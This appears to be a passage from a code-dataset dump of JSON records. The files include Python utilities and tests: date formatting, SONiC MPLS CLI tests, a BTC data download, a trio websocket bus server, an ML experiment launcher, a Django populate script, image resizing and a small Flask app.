past(days):\n return datetime.date.today() - datetime.timedelta(days=days)\n\n\ndef pretty_date(d):\n diff = datetime.datetime.now() - d\n s = diff.seconds\n if diff.days > 365 or diff.days < 0:\n return d.strftime('%d %b %y')\n if 60 > diff.days > 30:\n return '1 mês atrás'\n if diff.days > 60:\n return '{} meses atrás'.format(diff.days / 30)\n if diff.days == 1:\n return '1 dia atrás'\n if diff.days > 1:\n return '{} dias atrás'.format(diff.days)\n if s <= 1:\n return 'agora'\n if s < 60:\n return '{} segundos atrás'.format(s)\n if s < 120:\n return '1 minuto atrás'\n if s < 3600:\n return '{} minutos atrás'.format(s / 60)\n if s < 7200:\n return '1 hora atrás'\n return '{} horas atrás'.format(s / 3600)", "sub_path": "pycfiles/djangoplus-0.0.98.tar/dateutils.cpython-37.py", "file_name": "dateutils.cpython-37.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "calendar.day_name", "line_number": 9, "usage_type": "attribute"}, {"api_name": "calendar.day_name", "line_number": 10, "usage_type": "attribute"}, {"api_name": "calendar.month_name", "line_number": 11, "usage_type": "attribute"}, {"api_name": "calendar.month_name", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "calendar.monthrange", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 54, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}]} {"seq_id": "461565645", "text": "import os\nimport sys\nimport traceback\nfrom unittest import mock\n\nfrom click.testing import CliRunner\n\nfrom .mock_tables import dbconnector\n\nimport config.main as config\nimport show.main as show\nfrom utilities_common.db import Db\n\nshow_interfaces_mpls_output=\"\"\"\\\nInterface MPLS State\n------------ ------------\nEthernet2 enable\nEthernet4 disable\nEthernet8 disable\nEthernet16 disable\nLoopback0 disable\nPortChannel2 disable\nVlan2 enable\n\"\"\"\n\nshow_interfaces_mpls_specific_output=\"\"\"\\\nInterface MPLS State\n----------- ------------\nEthernet2 enable\n\"\"\"\n\nmodules_path = os.path.join(os.path.dirname(__file__), \"..\")\ntest_path = os.path.join(modules_path, \"tests\")\nsys.path.insert(0, modules_path)\nsys.path.insert(0, test_path)\nmock_db_path = os.path.join(test_path, \"mpls_input\")\n\n\nclass TestMpls(object):\n @classmethod\n def 
setup_class(cls):\n print(\"SETUP\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"1\"\n\n def test_config_mpls_add(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"add\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"enable\"}\n\n def test_config_mpls_remove(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"remove\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"disable\"}\n\n def test_show_interfaces_mpls(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_output\n\n def test_show_interfaces_mpls_specific(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [\"Ethernet2\"])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_specific_output\n\n @classmethod\n def teardown_class(cls):\n print(\"TEARDOWN\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"0\"\n dbconnector.dedicated_dbs['APPL_DB'] = None\n", "sub_path": "tests/mpls_test.py", "file_name": "mpls_test.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "click.testing.CliRunner", "line_number": 46, "usage_type": "call"}, {"api_name": "utilities_common.db.Db", "line_number": 47, "usage_type": "call"}, {"api_name": "config.main.config", "line_number": 50, "usage_type": "attribute"}, {"api_name": "config.main", "line_number": 50, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 57, "usage_type": "call"}, {"api_name": "utilities_common.db.Db", "line_number": 58, "usage_type": "call"}, {"api_name": "config.main.config", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.main", "line_number": 61, "usage_type": 
"name"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 69, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 69, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 71, "usage_type": "call"}, {"api_name": "show.main.cli", "line_number": 72, "usage_type": "attribute"}, {"api_name": "show.main", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 80, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 80, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 82, "usage_type": "call"}, {"api_name": "show.main.cli", "line_number": 83, "usage_type": "attribute"}, {"api_name": "show.main", "line_number": 83, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 92, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 93, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 93, "usage_type": "name"}]} {"seq_id": "331995994", "text": "\"\"\"\n下载\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom urllib.request import urlopen\n\nimport json\nimport requests\n\njson_url = \"https://raw.githubusercontent.com/muxuezi/btc/master/btc_close_2017.json\"\nresponse = urlopen(json_url)\n\n# 读取数据\nreq = response.read()\n# print(type(req))\n# print(req)\n# 将数据写入文件\nwith open(\"btc_close_2017_down.json\", 'wb') as f:\n f.write(req)\n\n# 加载json格式\n# with open(\"btc_close_2017_down.json\", 'r') as f:\n# file_urllib = json.load(f)\n# print(file_urllib)\nfile_urllib = json.loads(str(req, 'utf-8'))\nprint(file_urllib)\n\n# 使用requests\n\nreq = requests.get(json_url)\nwith open('btc_close_2017_down_requests.json', 'w') as f:\n f.write(req.text)\n\nprint(req.json())\n\n", "sub_path": "PythonCrashCourse/chapter16/btc_close_2017.py", "file_name": "btc_close_2017.py", "file_ext": "py", "file_size_in_byte": 806, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "urllib.request.urlopen", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}]} {"seq_id": "605007916", "text": "import json\nimport logging\nfrom dataclasses import asdict\nfrom json.decoder import JSONDecodeError\n\nimport asyncclick as click\nimport trio\nfrom trio_websocket import ConnectionClosed, serve_websocket\n\nfrom utils import Bus, Frame, WindowBounds\nfrom validators import get_validated_bus_data, get_validated_map_frame\n\nBUSES = {}\n\n\nasync def start_bus_data_share(request):\n \"\"\"\n Accepts: json with \"busId\",\"lat\",\"lng\",\"route\"\n \"\"\"\n ws = await request.accept()\n while True:\n try:\n bus_json = await ws.get_message()\n bus_dict = get_validated_bus_data(bus_json)\n if bus_dict is None:\n continue\n else:\n await ws.send_message(\"ok\")\n bus_id = bus_dict[\"busId\"]\n BUSES[bus_id] = Bus(**bus_dict)\n logging.info(f\"got {bus_id}\")\n except ValueError as e:\n logging.info(f\"bus = {e}\")\n await ws.send_message(\n 
json.dumps({\"bus_error\": str(e), \"msgType\": \"Error\"})\n )\n except JSONDecodeError:\n logging.info(\"Invalid JSON Data\")\n await ws.send_message(\n '{\"bus_error\": \"Invalid JSON Data\", \"msgType\": \"Error\"}'\n )\n\n\nasync def start_browser_data_share(request):\n \"\"\"\n Sends: buses json\n Receives: Browser Frame with coordinatess\n \"\"\"\n frame = Frame()\n ws = await request.accept()\n async with trio.open_nursery() as nursery:\n nursery.start_soon(get_map_frame, ws, frame)\n nursery.start_soon(send_buses_data, ws, frame)\n\n\nasync def send_buses_data(ws, frame: Frame):\n while True:\n logging.info(\"got browser request\")\n if frame.get_bounds() is not None:\n filtered_buses = filter(frame.is_inside, BUSES.values())\n\n await ws.send_message(\n json.dumps(\n {\n \"msgType\": \"Buses\",\n \"buses\": [asdict(bus) for bus in filtered_buses],\n }\n )\n )\n else:\n logging.info(\"frame is empty\")\n await trio.sleep(2.5)\n\n\nasync def get_map_frame(ws, frame: Frame):\n while True:\n try:\n frame_json = await ws.get_message()\n logging.info(\"got frame from browser\")\n frame_dict = get_validated_map_frame(frame_json)\n if frame_dict is None or (not \"data\" in frame_dict):\n continue\n frame.update(WindowBounds(**frame_dict[\"data\"]))\n except ValueError as e:\n logging.info(f\"map = {e}\")\n await ws.send_message(\n json.dumps({\"frame_error\": str(e), \"msgType\": \"Error\"})\n )\n except JSONDecodeError:\n logging.info(\"Invalid JSON Data\")\n await ws.send_message(\n '{\"frame_error\": \"Invalid JSON Data\", \"msgType\": \"Error\"}'\n )\n\n\nasync def bus_connection(port):\n while True:\n try:\n async with trio.open_nursery() as nursery:\n nursery.start_soon(\n serve_websocket,\n start_bus_data_share,\n \"127.0.0.1\",\n port,\n None,\n )\n except ConnectionClosed:\n logging.info(\"sensors connection problem\")\n\n\nasync def browser_connection(port):\n while True:\n try:\n async with trio.open_nursery() as nursery:\n nursery.start_soon(\n serve_websocket,\n start_browser_data_share,\n \"127.0.0.1\",\n port,\n None,\n )\n except ConnectionClosed:\n logging.info(\"closed browser\")\n\n\nasync def main(bus_port: int, browser_port: int, v: bool):\n if v:\n logging.basicConfig(level=logging.INFO)\n else:\n logging.basicConfig(level=logging.ERROR)\n\n async with trio.open_nursery() as nursery:\n nursery.start_soon(bus_connection, bus_port)\n nursery.start_soon(browser_connection, browser_port)\n\n\n@click.command()\n@click.option(\"--bus_port\", default=8080, help=\"порт для имитатора автобусов\")\n@click.option(\"--browser_port\", default=8000, help=\" порт для браузера\")\n@click.option(\"--v\", default=False, help=\"настройка логирования\")\ndef run(bus_port: int, browser_port: int, v: bool):\n trio.run(main, bus_port, browser_port, v)\n\n\nif __name__ == \"__main__\":\n run()\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "validators.get_validated_bus_data", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.Bus", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 35, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.info", 
"line_number": 38, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 49, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 56, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 63, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "trio.sleep", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 75, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "validators.get_validated_map_frame", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.WindowBounds", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 85, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 89, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 90, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 99, "usage_type": "call"}, {"api_name": "trio_websocket.serve_websocket", "line_number": 101, "usage_type": "argument"}, {"api_name": "trio_websocket.ConnectionClosed", "line_number": 107, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 108, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 114, "usage_type": "call"}, {"api_name": "trio_websocket.serve_websocket", "line_number": 116, "usage_type": "argument"}, {"api_name": "trio_websocket.ConnectionClosed", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 128, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 130, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 130, "usage_type": "attribute"}, {"api_name": "trio.open_nursery", "line_number": 132, "usage_type": "call"}, {"api_name": "trio.run", "line_number": 142, "usage_type": "call"}, {"api_name": "asyncclick.command", "line_number": 137, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 138, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 139, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 140, "usage_type": "call"}]} {"seq_id": "301842047", "text": "\"\"\" The entry point of configure and launch experiment.\n\"\"\"\nfrom exptools.launching.variant import VariantLevel, make_variants, update_config\nfrom exptools.launching.affinity import encode_affinity, quick_affinity_code\nfrom exptools.launching.exp_launcher import run_experiments\n\nfrom os import path\n\nfrom vos.experiments.launch_pretrain_vos import get_default_config\n\ndef main(args):\n experiment_title = \"video_segmentation\"\n affinity_code = encode_affinity(\n n_cpu_core= 48,\n n_gpu= 4,\n gpu_per_run= 4,\n )\n default_config = get_default_config()\n default_config[\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 0\n\n # set up variants\n variant_levels = list()\n\n values = [\n # [\"EMN\", ],\n [\"STM\", ],\n ]\n dir_names = [\"NN{}\".format(*v) for v in values]\n keys = [\n (\"solution\", ),\n ]\n 
variant_levels.append(VariantLevel(keys, values, dir_names))\n\n values = [\n # [1, 1, int(1e10), 0.9],\n [24, 24, 1e-5, int(1e10), 0.9],\n # [20,20,5e-5, int(1e10), 0.9],\n ]\n dir_names = [\"train_spec-{}-{}-{}-{}\".format(*v[1:]) for v in values]\n keys = [\n (\"pretrain_dataloader_kwargs\", \"batch_size\"),\n (\"dataloader_kwargs\", \"batch_size\"),\n (\"algo_kwargs\", \"learning_rate\"),\n (\"algo_kwargs\", \"lr_max_iter\"),\n (\"algo_kwargs\", \"lr_power\"),\n ]\n variant_levels.append(VariantLevel(keys, values, dir_names))\n\n values = [\n # [None],\n [\"/root/VideoObjSeg/data/weightfiles/STM_pretrain_51.82-52.93.pkl\"],\n # [\"/root/VideoObjSeg/data/weightfiles/STM_fulltrain_62.84-66.74.pkl\"],\n # [\"/root/VideoObjSeg/data/weightfiles/EMN_pretrain_54.50-59.29.pkl\"],\n ]\n dir_names = [(\"pretrainFalse\" if i[0] is None else \"pretrainTrue\") for i in values]\n keys = [\n (\"pretrain_snapshot_filename\", ),\n ]\n variant_levels.append(VariantLevel(keys, values, dir_names))\n\n variants, log_dirs = make_variants(*variant_levels)\n for i, variant in enumerate(variants):\n variants[i] = update_config(default_config, variant)\n if args.debug > 0:\n # make sure each complete iteration has gone through and easy for debug\n variants[i][\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"max_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"eval_interval\"] = 2\n variants[i][\"runner_kwargs\"][\"log_interval\"] = 4\n variants[i][\"pretrain_dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"pretrain_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"eval_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"random_subset_kwargs\"][\"subset_len\"] = 2\n \n run_experiments(\n script=\"vos/experiments/videoSeg.py\",\n affinity_code=affinity_code,\n experiment_title=experiment_title+(\"--debug\" if args.debug else \"\"),\n runs_per_setting=1,\n variants=variants,\n log_dirs=log_dirs,\n debug_mode=args.debug,\n )\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--debug', help= 'A common setting of whether to entering debug mode for remote attach',\n type= int, default= 0,\n )\n\n args = parser.parse_args()\n if args.debug > 0:\n # configuration for remote attach and debug\n import ptvsd\n import sys\n ip_address = ('0.0.0.0', 5050)\n print(\"Process: \" + \" \".join(sys.argv[:]))\n print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # Allow other computers to attach to ptvsd at this IP address and port.\n ptvsd.enable_attach(address=ip_address,)\n # Pause the program until a remote debugger is attached\n ptvsd.wait_for_attach()\n print(\"Process attached, start running into experiment...\", flush= True)\n ptvsd.break_into_debugger()\n\n main(args)\n", "sub_path": "vos/experiments/launch_maintrain_vos.py", "file_name": "launch_maintrain_vos.py", "file_ext": "py", "file_size_in_byte": 4097, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "exptools.launching.affinity.encode_affinity", "line_number": 13, "usage_type": "call"}, {"api_name": "vos.experiments.launch_pretrain_vos.get_default_config", "line_number": 18, "usage_type": "call"}, {"api_name": "exptools.launching.variant.VariantLevel", "line_number": 32, "usage_type": "call"}, {"api_name": 
"exptools.launching.variant.VariantLevel", "line_number": 47, "usage_type": "call"}, {"api_name": "exptools.launching.variant.VariantLevel", "line_number": 59, "usage_type": "call"}, {"api_name": "exptools.launching.variant.make_variants", "line_number": 61, "usage_type": "call"}, {"api_name": "exptools.launching.variant.update_config", "line_number": 63, "usage_type": "call"}, {"api_name": "exptools.launching.exp_launcher.run_experiments", "line_number": 77, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ptvsd.enable_attach", "line_number": 105, "usage_type": "call"}, {"api_name": "ptvsd.wait_for_attach", "line_number": 107, "usage_type": "call"}, {"api_name": "ptvsd.break_into_debugger", "line_number": 109, "usage_type": "call"}]} {"seq_id": "283343219", "text": "from flask import Response, request\nfrom database.sucursal import Sucursal\nfrom flask_restful import Resource\n\nclass SucursalApi(Resource):\n def get(self):\n agencies = Sucursal.objects().to_json()\n return Response(agencies, mimetype=\"application/json\", status=200)\n\n def post(self):\n body = request.get_json()\n agency = Sucursal(**body).save()\n id = agency.id\n return {'id': str(id)}, 200\n", "sub_path": "resources/sucursal.py", "file_name": "sucursal.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask_restful.Resource", "line_number": 5, "usage_type": "name"}, {"api_name": "database.sucursal.Sucursal.objects", "line_number": 7, "usage_type": "call"}, {"api_name": "database.sucursal.Sucursal", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "database.sucursal.Sucursal", "line_number": 12, "usage_type": "call"}]} {"seq_id": "573649687", "text": "import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django.settings')\n\nimport django\ndjango.setup()\nfrom rango.models import Category, Page\n\ndef populate():\n\n python_pages = [\n {\"title\": \"Official Python Tutorial\", \"url\": \"http://docs.python.org\"},\n {\"title\": \"How to be a computer scientist\", \"url\": \"http://www.somebullshit.com\"},\n {\"title\": \"Learn Python in 10 mins\", \"url\": \"http://www.korokithakis.net\"}\n ]\n\n django_pages = [\n {\"title\": \"Official Django Tutorial\", \"url\": \"http://docs.djangoproject.com\"},\n {\"title\": \"Django Rocks\", \"url\": \"http://www.djangorocks.com\"},\n {\"title\": \"Tango with Djano\", \"url\": \"http://www.tangowithdjango.com\"}\n ]\n\n other_pages = [\n {\"title\": \"Volvic\", \"url\": \"http://www.volvic.com\"},\n {\"title\": \"Facebook\", \"url\": \"http://www.facebook.com\"}\n ]\n\n cats = {\"Python\": {\"pages\": python_pages,\"views\": 128, \"likes\": 64}, \"Django\": {\"pages\": django_pages, \"views\": 64, \"likes\":32}, \"Random\": {\"pages\": other_pages, \"views\":32,\"likes\":16}}\n\n for cat, cat_data in cats.items():\n c = add_cat(cat, cat_data[\"views\"],cat_data[\"likes\"])\n for p in cat_data[\"pages\"]:\n add_page(c, p[\"title\"], p[\"url\"])\n\n for c in Category.objects.all():\n for p in Page.objects.filter(category=c):\n print(\"- {0} - {1}\".format(str(c), 
str(p)))\n\ndef add_page(cat, title, url, views=0):\n\n    p = Page.objects.get_or_create(category=cat, title=title)[0]\n    p.url=url\n    p.views=views\n    p.save()\n    return p\n\ndef add_cat(name, views, likes):\n    c = Category.objects.get_or_create(name=name)[0]\n    c.views=views\n    c.likes=likes\n    c.save()\n    return c\n\n\nif __name__=='__main__':\n    print (\"Starting populate script\")\n    populate()\n", "sub_path": "populate_rango.py", "file_name": "populate_rango.py", "file_ext": "py", "file_size_in_byte": 1790, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "os.environ.setdefault", "line_number": 3, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 6, "usage_type": "call"}, {"api_name": "rango.models.Category.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "rango.models.Category.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rango.models.Category", "line_number": 35, "usage_type": "name"}, {"api_name": "rango.models.Page.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "rango.models.Page.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rango.models.Page", "line_number": 36, "usage_type": "name"}, {"api_name": "rango.models.Page.objects.get_or_create", "line_number": 41, "usage_type": "call"}, {"api_name": "rango.models.Page.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "rango.models.Page", "line_number": 41, "usage_type": "name"}, {"api_name": "rango.models.Category.objects.get_or_create", "line_number": 48, "usage_type": "call"}, {"api_name": "rango.models.Category.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rango.models.Category", "line_number": 48, "usage_type": "name"}]} {"seq_id": "23605552", "text": "from scipy.misc.pilutil import imresize\n\n__author__ = 'peter'\n\n\ndef resize_while_preserving_aspect_ratio(im, x_dim=None, y_dim=None):\n    \"\"\"\n    Resize an image, while preserving the aspect ratio. 
For this you need to specify either x_dim or y_dim.\n\n    :param im: The image: a 2D or 3D array.\n    :param x_dim: An integer indicating the desired size, or None, to leave it loose.\n    :param y_dim: An integer indicating the desired size, or None, to leave it loose.\n    :return: A new image whose x_dim or y_dim matches the constraint\n    \"\"\"\n    assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n\n    x_dim = float('inf') if x_dim is None else x_dim\n    y_dim = float('inf') if y_dim is None else y_dim\n\n    box_aspect_ratio = x_dim/float(y_dim)\n    image_aspect_ratio = im.shape[1] / float(im.shape[0])\n    if image_aspect_ratio > box_aspect_ratio: # Active constraint is width\n        return imresize(im, size=(int(x_dim/image_aspect_ratio+.5), x_dim))\n    else: # Active constraint is height\n        return imresize(im, size=(y_dim, int(y_dim*image_aspect_ratio+.5)))\n\n\ndef equalize_image_dims(list_of_images, x_dim = None, y_dim = None):\n    \"\"\"\n    Resize images so that they match roughly in size although their aspect ratio will be preserved.\n    :param list_of_images: A list of numpy arrays representing images (2D or 3D arrays)\n    :param size: A 2-tuple specifying the desired (y_size, x_size).\n        Each of (y_size, x_size) can be:\n        - An integer, meaning that this axis of the image will remain equal or smaller than this number of pixels.\n        - None, meaning that there is no constraint along this axis (e.g. (224, None) just states that the image will be\n          scaled to 224 pixels in the vertical direction - the horizontal will be whatever size is needed to maintain\n          the aspect ratio.\n        - 'max': Meaning that we take the largest image size along this axis.\n        - 'min': Meaning that we take the smallest image size along this axis.\n\n        The image will then be scaled so that the image size remains inside this box (although, unless the aspect ratio\n        matches exactly, one dimension will be smaller).\n\n    :return: Another list of images.\n    \"\"\"\n    assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n    if len(list_of_images)==0:\n        return []\n    x_dim = max(im.shape[1] for im in list_of_images) if x_dim=='max' else \\\n        min(im.shape[1] for im in list_of_images) if x_dim=='min' else \\\n        x_dim\n    y_dim = max(im.shape[0] for im in list_of_images) if y_dim=='max' else \\\n        min(im.shape[0] for im in list_of_images) if y_dim=='min' else \\\n        y_dim\n    new_list_of_images = [resize_while_preserving_aspect_ratio(im, x_dim=x_dim, y_dim=y_dim) for im in list_of_images]\n    return new_list_of_images\n", "sub_path": "artemis/general/image_ops.py", "file_name": "image_ops.py", "file_ext": "py", "file_size_in_byte": 2878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "scipy.misc.pilutil.imresize", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.misc.pilutil.imresize", "line_number": 25, "usage_type": "call"}]} {"seq_id": "484648432", "text": "\nfrom flask import Flask, redirect\nfrom flask import url_for\nimport os\napp = Flask(__name__, static_folder=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test')\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\nfp=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test'\n\nclass overallData:\n    counter = 0\n\ndataHold = overallData()\n\n@app.route('/')\ndef displayImg():\n    dataHold.counter += 1\n    for counter,file in enumerate(os.listdir(fp)):\n        if counter+1 == 
dataHold.counter:\n            try:\n                print(file)\n                img_url = url_for('static',filename=file)\n                return redirect(img_url)\n            except:\n                return '\\n\\n    Sad\\n\\n    '\n    return '\\n\\n    Sorry\\n\\n
    '\n\nif __name__ == '__main__':\n app.run(port=8080,debug=True)\n", "sub_path": "PicDisp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}]} {"seq_id": "309222404", "text": "\r\nimport logging\r\nfrom collections import OrderedDict\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom torch.nn.modules.activation import Sigmoid, ReLU\r\n\r\nfrom allennlp.modules.conditional_random_field import ConditionalRandomField\r\nfrom allennlp.modules import FeedForward\r\nfrom allennlp.modules.span_extractors import SelfAttentiveSpanExtractor\r\nfrom allennlp.modules.span_extractors import EndpointSpanExtractor\r\nfrom allennlp.modules import TimeDistributed, Pruner\r\nfrom 